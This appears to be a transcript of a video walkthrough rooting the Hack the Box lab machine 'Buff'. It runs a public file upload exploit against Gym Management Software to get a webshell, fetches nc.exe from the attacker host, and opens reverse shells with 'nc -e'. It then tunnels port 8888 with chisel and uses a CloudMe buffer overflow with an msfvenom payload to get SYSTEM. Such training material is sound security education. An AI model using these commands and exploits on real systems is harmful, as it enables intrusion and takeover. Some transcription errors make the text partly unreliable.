Hello all, welcome to Global Offensive Hacker Associate community and welcome to another hacking episode of Hacker Associate. In this hacking episode, we are going to learn about tunneling concept and we'll see how we can root the machine using a tunneling. So I am taking one of the machine which is listed under Hack the Box, and here is one of the active machine. You can clearly see this active machine and here are the machines. You can use it, and right now I'm going to show you how we can root this machine called as buff. And you can see like who owns the root user. Only like 4747 people who own the root user, and the user flag like 11071 people have taken this user flag. And we'll see today complete walkthrough on this particular part named buff and how we can root this machine. I am Harshad, founder and CEO of Hacker Associate. Let's begin. So first what we have to do is, as usual, we have to perform a recon. In my case, I have already done. In your case, if you're not done, you can use this command nmap, this minus s capital C minus s capital V, and then output double verbose, all port scanning, and then IP address. So once you scan, using this command, you will see this particular port open there. One is called 7680 and then second is called 8080. So it look like, you can see it's called HTTP proxy. So it's already, like I taught you last time, whenever you see, any port related to the web, immediately jump to the Firefox and you can check it out. So I'm moving toward the Firefox, and then check it out, like what is on port 8080. So the machine IP address is 10.10.10.98 and here is the 8080. So when you talk about 8080, you can see something is there, something is opening. It's kind of web page. Let me zoom it. So here are some images are available. So let's scroll, and here is Gym image, nothing useful here. Here you can see we have an email and we have a password. We can perform an injection here in this parameter and try to sign in. Let's understand the functionality of the application first. So here is the packages. You can simply go and open link in new tab, facility, open link in new tab, view details, check it out what is exactly available on this particular page. Like we have a bro hut packages, durations and other things are available here. Check these pages, the same thing. Check these pages, same thing. We can also check for the source code if you want. But when I roam here in this particular tabs, like I will reach to this particular tab called as contact tab, and here I identify useful information we call it a gym management software. Copy that information. You can simply go to the another workspace, and I'm going to open my another terminal and try to open using a search exploit. So this is my search exploit, and I can use Ctrl Shift V. You can see press enter. So in this case, like I didn't get any result, but what I can do is I can simply just type gym management, enter. And here you can clearly see this is called version 1.0, and whatever the version we have here also is called 1.0, right? And when you can check here in this section, it is called 48506.py. This is we got it here. The py, it was a Python. We can say the exploit. Now you can simply, you want to download, you can simply use search exploit minus w, and you can use gym management. So you can see now, right now the link is enabled. You can open the link and you can download this particular exploit. Or you can also do, you can go to the path, you can copy that particular payload, put it here. There are many ways, you can do this stuff, but right now I'm not focusing on how to download. I think this already you are master in this, how to download from the server this particular payload. I'm just directly navigating to the directory where this my payload is available. So in my case, in the document, and let me go give the proper path. This is my buff machine and here is the payload. So again I will just run the command called search exploit gym management, and here is called 48506. It is called 48506.py. And I copied this particular payload to this particular thing, right? It means simple rename it this particular exploit. Now further what I can do is I can simple type this Python, and before running the command is best way is you can simple open this particular payload. Let's say here open it, right click, copy the address and just put it here, because this is the best way, right? Rather than directly writing like this particular exploit, like we whatever like the file extension we have identified like Python. Before this you just understand the payload meaning or the exploit meaning. So example, if you read from here, you can clearly see it is like using Python 2.7.17, and the gym management software version 1.0 suffer from an unauthenticated file upload vulnerability. So basically it's a file upload vulnerability, and here okay are the details. So access the upload page slash upload page, and it does not check for the authentication user session. So let's try it. Here okay we have a PHP and just try to upload the page. Upload.php, enter. So when I try to press enter, let's check it out. You can see something is coming here. Okay, id equal to c, we have a XAMPP and htdocs gem upload.php. Let me try okay something like that, id equal to who am I, because let me check with the command injection vulnerability. So nothing okay like happen here. Let's again read the payload, what exactly it is telling to us. Second, set the id parameter of the get request to the desired file name for the uploaded file, and here you can try this one called id equal to, we have some name display here. After that, when you just try to read from this section, basically it is a file upload vulnerability. It is telling like change the content type, so we can easily do this thing okay using a bar if needed. And when you go and check okay like how is communicating, so here you can see this is called defined, the function is defined called as a web shell, and some okay argument is passing there. Let's check what is server URL. So server URL is here, so it is going to upload this the particular PHP file, and here okay it is talking to telepathy, and here it is printing something, and if you can check, successfully connected to the web shell. That's how this payload work. So in order to run this payload okay, it means directly we can run the payload, and here is example written there how to run the payload. I'm just checking okay if anything we get interesting. So let's okay do the first step. So simple go here and simple just type this command. So we'll use Python and then gmpy, and this command I'm going to write now. So let's see here, waiting for the shell, and here you go, you got the shell, fantastic. So you can simply just type dir, and here okay we have okay call as a page call as in .php extension, right? So what you can copy this one, okay, and here okay it is uploaded under this directory. Okay, so let me try this one first. Go to the browser where it is we have here, right? So now we are going to change this particular part. Let me check what we are getting when we just type 8080. It is done. Now simple slash control shift V. Okay, so object not found. Okay, so let me check what exactly it is here. Again go to the payload and let's identify okay like what we can write okay instead of this. So here okay if we can check any clue, so we can do something. So we will upload this, we have a PHP. Okay, then upload then slash this one, right? So upload then slash. So let me go here and let me check. So in my case I not written upload, so it is called upload slash. Let me try this. This makes sense also. So after upload, yes, it is working. See the PNG image here, and it is done. Yeah, fantastic. After that, if you can go further, what is it is doing? Okay, and you can see the seventh number. Just try to read this particular line. So when you read this payload, communicating with the web shell at upload.php and ID equal to this, and using the get request with a telepathy parameter. So it is talking about instead of ID, you can use telepathy. So let me copy this particular section. Go to the again browser, and we can use okay like question mark telepathy. Yes, this is the actual command, we can use it. So you can see clearly okay we are getting the result here, right? Who am I? Fantastic. Now if you want to take a reverse shell from here also, you can take it. So one way is okay, as I mentioned to you, can run the payload which we just now we have done here. Okay, now second way is okay, you can simple go here and you can construct the command, or we can say construct okay like the malicious reverse shell, so we can get the reverse connection back to the particular attacker machine. So how we can construct this particular command? So what we can do is okay like first okay we need NC here. So let's again read the payload. So right now okay if you can check okay in this case okay where we have run this payload, right? Let me just type dir, and here we don't have anything. So let me try to okay like what we can say download NC file here and then try do something. So how we can download the NC? So NC is available okay under my OPT directory. So you can download the NC, go to Terminator. So what you can do is you can simple open a new tab and you can simple just type locate command, locate nc.exe, locate nc.exe, press enter. Here are the details. So in my case it is available under OPT. Let's go to the OPT, cd/opt ls, and here we have NC. Right now I want to download it, this particular thing, so I can run my Python server. Before running Python server, let me check the IP address. My IP address is called 10.10.14.4 and run my web server. So here you can see okay, we have a simple HTTP server port 80. Okay, this part is done. So now we can simple go here and we can simple just type here wget. So you can simple just type wget 10.10.14.4. we have nc.exe. Okay, let me try and press enter. If everything okay, yes, it is executed. And let me check here what is happening. So here in Python nothing okay fetched here. So right now you can check okay this terminal properly. This is very important part, okay, to checking the terminal. I have tried to download nc.exe, but here okay not showing anything. Okay, now I have to try to invoke this thing. How we can invoke it? So before this I have to understand this part first. Let me just type dir, and here okay not able to see anything. What I can do again, I can use the curl command. Let me just change wget and type curl and then press enter. You can also use -o also if you want. Okay, let me try this and check it out. It is now executing, and let me check okay here what is happening this side. Okay, fantastic, you can see now we have a get nc.exe. This is how we can use okay like curl command. So now I can simply just type dir, and here you go, we have nc.exe. Fantastic. Now I can, if I want, okay, I can give a shell from here to my attacker machine. Second way is okay, you can also directly take a shell from here. So example, you want to take a shell. Now you can simple go here nc and then IP address and you're done. So nc -e cmd.exe you can type, and then IP address which is called 10.10.14.4, and we have given the shell the port number 4444. Okay, and before this we have to start our 4444. So in my case is not available, so control shift plus T, and then I will run python nc lvp 4444. This port is started now. Okay, we are listening on this particular port. Go here, press enter. If everything okay, you will get the shell. Fantastic, you got the shell. This is how okay you can do something. Second case, okay, like what we can do now, we have to root the machine, right? In order to root this machine, let me check it out. So example, let's say here first you can go to cd. See, that's how we can go for the user flag. cd, we have users, then we have a dir. I think then we have to move to the desktop. cd, we have a shown user, then dir, then we have to go to the desktop. cd, we have a desktop, and here we get the root flag, user flag. So dir, and then here just type okay like command called type, and we have a user.txt. This is the first way we can identify the user flag. And second, okay, we have to identify the root flag. So what the best way we can identify okay this one is enumeration. Perform enumeration and then check what exactly is happening. So what I do, I use system info command and check it out. So many informations are available here, and let me copy it. If you want, you can copy all the information, okay, in order to further analysis. Here the user shown, and I think it's a 64-bit architecture. Yes, 64-bit PC, Windows 10 operating system. So it means we are dealing with the Windows 10, okay, and as I mentioned to you, it is a Windows box which we are going to root now. Okay, nothing useful here. Okay, you can simply copy it. Okay, further you will see this part. Okay, like for analysis part, but you can keep a copy of this system info. Second part, what we can check it. Okay, we can check for the services running inside this United States -a. When you press enter, and you can see there are several services are running there. So 0000135 and then 49644, and then we have a 8080, just waiting for the output. So once we get the output, okay, then I will show you other things. And when we look around this, so here was a loop back. So this is very important part, okay, loop back part. So here, okay, we have 127.0.0.1.19.00, then we have a 56907, and these ports are there. And when you go here, these are loopback 3306 and the IP address. Okay, now let me perform enumeration. Go to the CD, simple C, put CD dot dot. Let me check what is happening. dir. Now we have shown, right? Now just check the download folder, what is available inside this. So when I was roaming here, okay, I found one interesting thing. There is an exe file available. Its name is called the cloudme112.exe. This is the exe file. Okay, so you can simple copy this one and just check it out what exactly it is. So copy it and you can simple go here and you can paste it here. Press enter and you can simple copy paste here. Okay, we got something. It's called cloudme111.11.2. It's a buffer exploit available here. So it means it's also vulnerable. So let me try and check what exactly is going on. So here is exploit and this is socket target. So when you try to read this payload, okay, you can see there's a target required 127.0.0.1, and here is the payload generation command. You can see clearly this. You can use this command, okay, in order to get the connection back. And if you can go downside here, okay, we have like trying to connect to the connection is called 8888. So it means 8888 port, okay, like we have to check on the remote machine, like in the client machine where we are doing some stuff, right there. Okay, we have to check for these ports, but unfortunately we didn't find anything right now. What I can do is again I can go and I'll try to run this file. Let me just check cloud, control shift to me and then run it. Okay, I try to run this file. You can see it is running now. Now just type net state -pant. Sorry, this command is for Linux, so it is -a, and here you go. Let's see we are able to get any port or not. So when I try to run, you can use // also, okay, if it's a PowerShell, but I'm just typing and checking what exactly the output. So I think I'll get something here. This is still loopback. I'm not able to see any port related to the 8888. Maybe it will take a time. Okay, then I'm able to see. So this part, okay, is called enumeration. So we have to do proper enumeration. So that's why actually the root part is little bit difficult, but if you do proper enumeration, it's very easy for us. Right, I'm not able to see any port, okay, open here. So what I can do is I can just wait for it a little bit. Again, try to run the command. I will try to run the // and then here nothing. So it means we have to run directly only because it's not a PowerShell. Okay, this is the one way, okay, you can get the shell. Okay, second, you can just try to enumerate this bunch of stuff. Second way, okay, like what you can do, you can simple exit from here. Let me exit from this section. Control C, Control Z, Control L, and here, okay, you can close the port if you want, and this part I'm going to close exit. My Python server is running. Second way is, okay, this, for example, right now I'm here, okay, and here, okay, you can see right now I'm running something on my port 80. So right now, okay, like I want to give a shell from here to here. So how we can do that? So you can use again nc -e PowerShell .exe and the IP address. So we have 10.10.14.4, okay, and the port number which is we can take 4444. Before pressing enter, we need, okay, port should be listening on this. It is listening, and now when you press enter, so I hope, okay, you will be getting a shell. Yes, so you are getting a shell. Is called as a PowerShell. We got the shell. Let's just type okay net state minus a. Okay, because according to the payload, okay, if we can check, okay, like it is making a connection on 8888. So I want to check, okay, like what is 8888, and here is called CloudMe 1.11.2 buffer overflow. This is called POC. Now you can clearly see, okay, when I try to navigate to this folder, okay, using a PowerShell, so you download and then dir identify this file, and when I try to run this file and then immediately I try the netstate command, I got something here. So you can clearly see here is called 8888. Okay, this port is there. Now what I have to do is, okay, I have to do a tunneling, and I will take this part, okay, to my Kali, and then okay, we do something there. It means like we have to run this file. This is a buffer, right? This is exploit we have to execute on this target on the port 8888. And before this also we have to generate, okay, this payload also. So let me do something here. So what I can do, okay, the next is I need, okay, like my script we call as an chisel. So I want to download my chisel script, okay, to here. So what I can do, I can simple exit from here right now. Okay, simple exit from here, Control C, go here, and where is our shell? Control C. Let me run the command again. And if you can check my new workspace, we'll go to cd/opt ls, and here, okay, we have called as a chisel, right? You can simply go to this cd chisel, enter ls. So here, okay, we have, okay, like the script available here, and we need, okay, this exe file, okay, should be transferred, okay, to the Windows box. Simple, we can run python -m simple http server. Okay, it is not working, so we'll put, okay, like 5555. Okay, it is running on this, and I want to transfer this file, so simple copy it, go here, just type, okay, like PowerShell, okay, then wget http, we have a 10.10.14.4 colon, we have a 5555, and we have a some file here called exe. I want to download this file, and I want to use out file, outfile, and the file name is same, enter. So everything okay, I'm able to download this file here. This is the second part we have to do, okay, it's called tunneling concept. So I think it is downloaded. Let me cross verify, and here, okay, not able to see anything. Let me again check what exactly is the command minus out file called chisel.exe. Everything look okay. Let me one more try PowerShell.exe, and then wget http 10.10.14.4, and then 5555. Let me check the port number properly, what exactly it is. 5555, and here we have a chisel. Okay, so now and then minus out file, enter. Okay, you can try like that. Okay, this is how we can do the PT. Just try this one. If not working, okay, we'll do some other thing. We can try our old method. Okay, we can use wget there, okay, like on browser level, and then we use curl command, and then we just try to download the file. So in our case, NC is downloaded successfully, so I'm hoping today I'm able to download this file also. Just wait for it a little bit, will take a time. here you go, right? So here, okay, we got the file here. So it is okay to use PowerShell.exe, not PowerShell. Okay, so this will not give a proper result. This is the command, you can use it always. Okay, now we got this thing. Okay, now what we have to do is we have to run this script, and then we will take everything, okay, to our attacker machine. How we can do that? So simple. Okay, you can give this shell nc -e PowerShell.exe, and then IP address. IP address is 10.10.14.4, and port number is 4444. So let's me open here, new tab, nc-lb 4444. It is done. Now let's send this thing, okay, to 4444. Now we are here to receive. So now this part is done, okay, and we got the things. So we'll get a PowerShell. Now just type dir. So we are here. So simple, just type net state minus pant, sorry, is a. So here is a look back, and if we can check the top here, okay, we have here, right, 8888. Fantastic. This part we got it. Now further what we can do is we can simple go to the attacker machine. So here let me, so we'll go to the cd/opt, where we have a file name is called this chisel. Cd we have this, and ls, and run the file. So how to run this one? So simple, run this one /server, and here, okay, you can just type 8080 reverse. When you press enter, it is listening on 8080. Now we'll take a reverse connection here. Okay, so now what we can do, we can simple just type, okay, let me just type dir again. So /, because the PowerShell, so we have to write chisel chisel.exe, and we'll use client IP address is 10.10.14.4 colon, we have a et, and then we can use r colon. Generally we are using, okay, like -r, right? So we can use here r colon 8888. You can take this one, okay, from this particular thing, 127.0.0.1 colon 8888. This how you can type it, okay. So here is the things. So example, simple, run this command and press enter. Everything okay, look fantastic, and here is connected. So if you can check this section, okay, let me scroll left this side, and here you got the connection. So example, let's say open a new tab. Let's split this part is horizontally. Let's go to the top. I can simply just type, okay, like net state and minus pent, and here you can see connection is called 8888 is established here, right? Now only thing is I have to download this payload, this one called as an CloudMe. So you can download this exploit, okay. So in my case it is available under this. So example, let's say if I go here cd under my document buff machine ls, here I have a buffer privilege.py. So let me open, okay, using a subline. When you press enter, here you go. So you can say target is specified, okay, and after that, okay, I have to use my IP address. So you can see this is a payload MSA Venom which I created. So what you can do is you can copy that particular part from here. They already provided a sample to you, okay, so you can simple copy it. So in my case I'm just going to copy from here, copy it, and we can go to the simple any new workspace and try to paste it here. So now you can check it out what exactly is happening. So we require the IP. So our IP address is 10.10.14.4, and we can change, okay, like this port number to 1339, and this part is okay, look okay. So MSA Venom -p Windows execution command from the upload, run the nc and give the shell to this IP address 1339, and we can simply split this part horizontally. we'll simple going to listen on NC minus L VVP 1339, enter. It is listening. And now what we can do, we can simple go here, just cross verify the IP address, everything, and press enter. Now this part is done. So once you press enter, okay, you will see, okay, like some code here. You can simple copy paste this particular thing, okay, to here, to the particular section payload. This particular part we have to replace it. And same thing, okay, we have done this particular thing, the same section we have already done, okay, using a chatterbox machine. So if you remember chatterbox, okay, from the hack the box, we have done the same thing, just like that. Let's go and check what is happening there. So I think it is done. Simple copy things from here, go to the top, till here we have to copy it and then paste it here. Use a proper editor, okay, it will be very easy for you in order to copy paste this thing. Right click, paste. So once you paste here, now you are done. Check the port again, it is called 8888. Fantastic. This part is done. You can simple save the file and then save. Now I can change my IP address which I use called 10.10.14.4. okay, now current IP, and the port I have used call as a 1339 because I'm using already for some other thing, right? So I can change my port here and yeah, we are done. File and then save, everything look okay, close it. Now what you can do, you can simple run it this file using this buffer privilege.py and you are done. Some issue, let me use Sublime again. Let me run Python and then try again. It is working, say issue regarding to the okay. Now when we run okay using Python, let me check, okay, like we got the shell or not. So we are here and we got the system shell. Fantastic. Here is the shell. Just type who am I, press enter. We are administrator. Now you can simple go dir many thing. Simple go navigate to the C directory and then try to fetch, okay, like the root flag cdc, and then we can go immediately users and then sorry, typo error, cdc users, we have a dir, then cd we have a administrator, ministrator dir, then we simple just type cd, we have a desktop. Otherwise you can simple just search dir /s/p root.txt, enter. Okay, so you can see we have a root flag here available under this location. Copy this cd, paste, enter dir, we have a type root.txt and you are done. This is how, okay, we can escalate the privilege. Fantastic. This is the way, okay, like how you can root this machine. I hope you enjoy this video. Thank you for watching the video. Have a great day ahead. Thank you.